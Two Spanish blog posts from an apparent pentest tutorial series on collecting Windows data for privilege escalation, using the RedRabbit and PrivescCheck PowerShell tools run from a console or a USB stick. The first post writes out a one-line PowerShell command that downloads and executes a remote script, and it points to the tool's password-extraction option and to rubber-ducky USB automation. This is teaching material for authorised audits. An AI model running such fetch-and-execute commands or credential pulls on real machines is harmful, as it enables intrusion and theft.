lunes, 30 de marzo de 2020

¨Recolectando información de mi Windows (III)


Hola de nuevo!!

Seguimos enclaustrados y la verdad, es que trabajando a tope. Se nota que con esta situación, aprovechais para estudiar, lo cual es bueno!!! De un problema una oportunidad!

Vamos a por otra herramienta en powershell que nos saca información del equipo auditado. En este caso, usaremos RedRabbit.
La podeis descargar desde aquí. O bien podeis llamar a la herramienta desde donde se aloja. en vuestro servidor de ataque o bien desde github.

Nosotros usaremos esto último, porque siempre tendremos la ventaja de que usaremos siempre la ultima version.

Abrimos el cmd como administrador si podemos y ejecutamos la instruccion siguiente:

powershell –nop –c “iex(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/securethelogs/RedRabbit/master/redrabbit.ps1’)”



 Una vez ejecutado, nos aparece un panel como este.



 Aquí tenemos una variedad de acciones que podemos realizar según lo que necesitemos sobre el objetivo.
Si queremos un analisis inicial, podremos poner la opcion 1. Si queremos escaneaar la red, la opcion 2 o 4...
Podemos intentar sacar passwords con la opcion 10, por ejemplo...



Lo interesante sería usar por ejemplo un usb como vimos en la entrada anterior, http://www.esbozosecreto.com/2020/03/recolectando-informacion-de-mi-windows.html , o bien usar un usb tipo rubber ducky para automatizar el proceso...

Pues a jugar un poquito  con la herramienta que tiene aplicaciones muy interesantes!!!

Saludos y a por otra semana enclaustrados

@fsanz_moya

domingo, 22 de marzo de 2020

Recolectando información de mi Windows (II)

Hola a tod@s de nuevo:

Hoy seguimos encerrados en casa y continuando con la escalada de privilegios de Windows, basándonos en el post anterior, donde con powershell y la herramienta PrivesCheck.ps1, conseguiamos información muy interesante de nuestro equipo. Esto es aplicable a auditorías físicas en clientes, así com la comprobación del antivirus, o del firewall de una empresa.

Hoy usaremos la misma herramienta, pero lo que vamos a hacer es meterla en un pendrive, para que podamos llevarla a todas partes y sea más rápido que estar escribiendo en la consola del ordenador.

Lo primero que tenemos que hacer es descargarnos la herrameinta completa en nuestro usb. Acordaros que podeis descargarla desde https://github.com/itm4n/PrivescCheck

Bien, una vez descargado en nuestro usb, si lo usamos en el equipo a auditar, tendremos que hacer lo mismo que en el post anterior, es decir, entrar en cmd del cliente y teclear lo mismo que en el post anterior. Ahora lo que queremos es ganar tiempo.

Pues bien, vamos a crear un pequeño archivo en Batch, que nos automatice el proceso. Ese archivo va a llamar a la consola de powershell y ejecutará el programa. Pero además le diremos que lo escriba en un archivo en nuestro usb, para ganar más tiempo aun.

Empezamos haciendo el archivo en Batch. Abrimos el notepad y escribimos lo siguiente:

 




Le estamos diciendo que llame a la consola de powershell, que ejecute el programa sin restricciones y despues llamamos al programa en sí. Por último, le decimos que lo escriba en un archivo llamado datos.txt y que se escribirá en nuestro usb, ya que lo vamos a ejecutar desde el usb mismo que introducimos.

El usb quedará de la siguente forma:




Ahora teemos que introducir el usb en el objetivo y clicar dos veces sobre el archivo bat que yo he llamado ataquecmd.bat. Una vez ejecutado, nos saldrá la siguiente imagen:



Así se quedará unos segundos hasta que nos aparezca lo siguiente...



Significa que ya ha terminado el proceso. Si ahora nos vamos a nuestro usb, veremos que se ha añadido un archivo.


Podeis observar lo que hay en su interior...






Como veis, teneis un usb muy útil, para escalar privilegios si en la auditoría te permiten usar equipos fisicamente.

Porbarlo y ya me contareis que tal os ha ido...

Saludos y a seguir en casa para que esta pandemia se acabe!!!

@fsanz_moya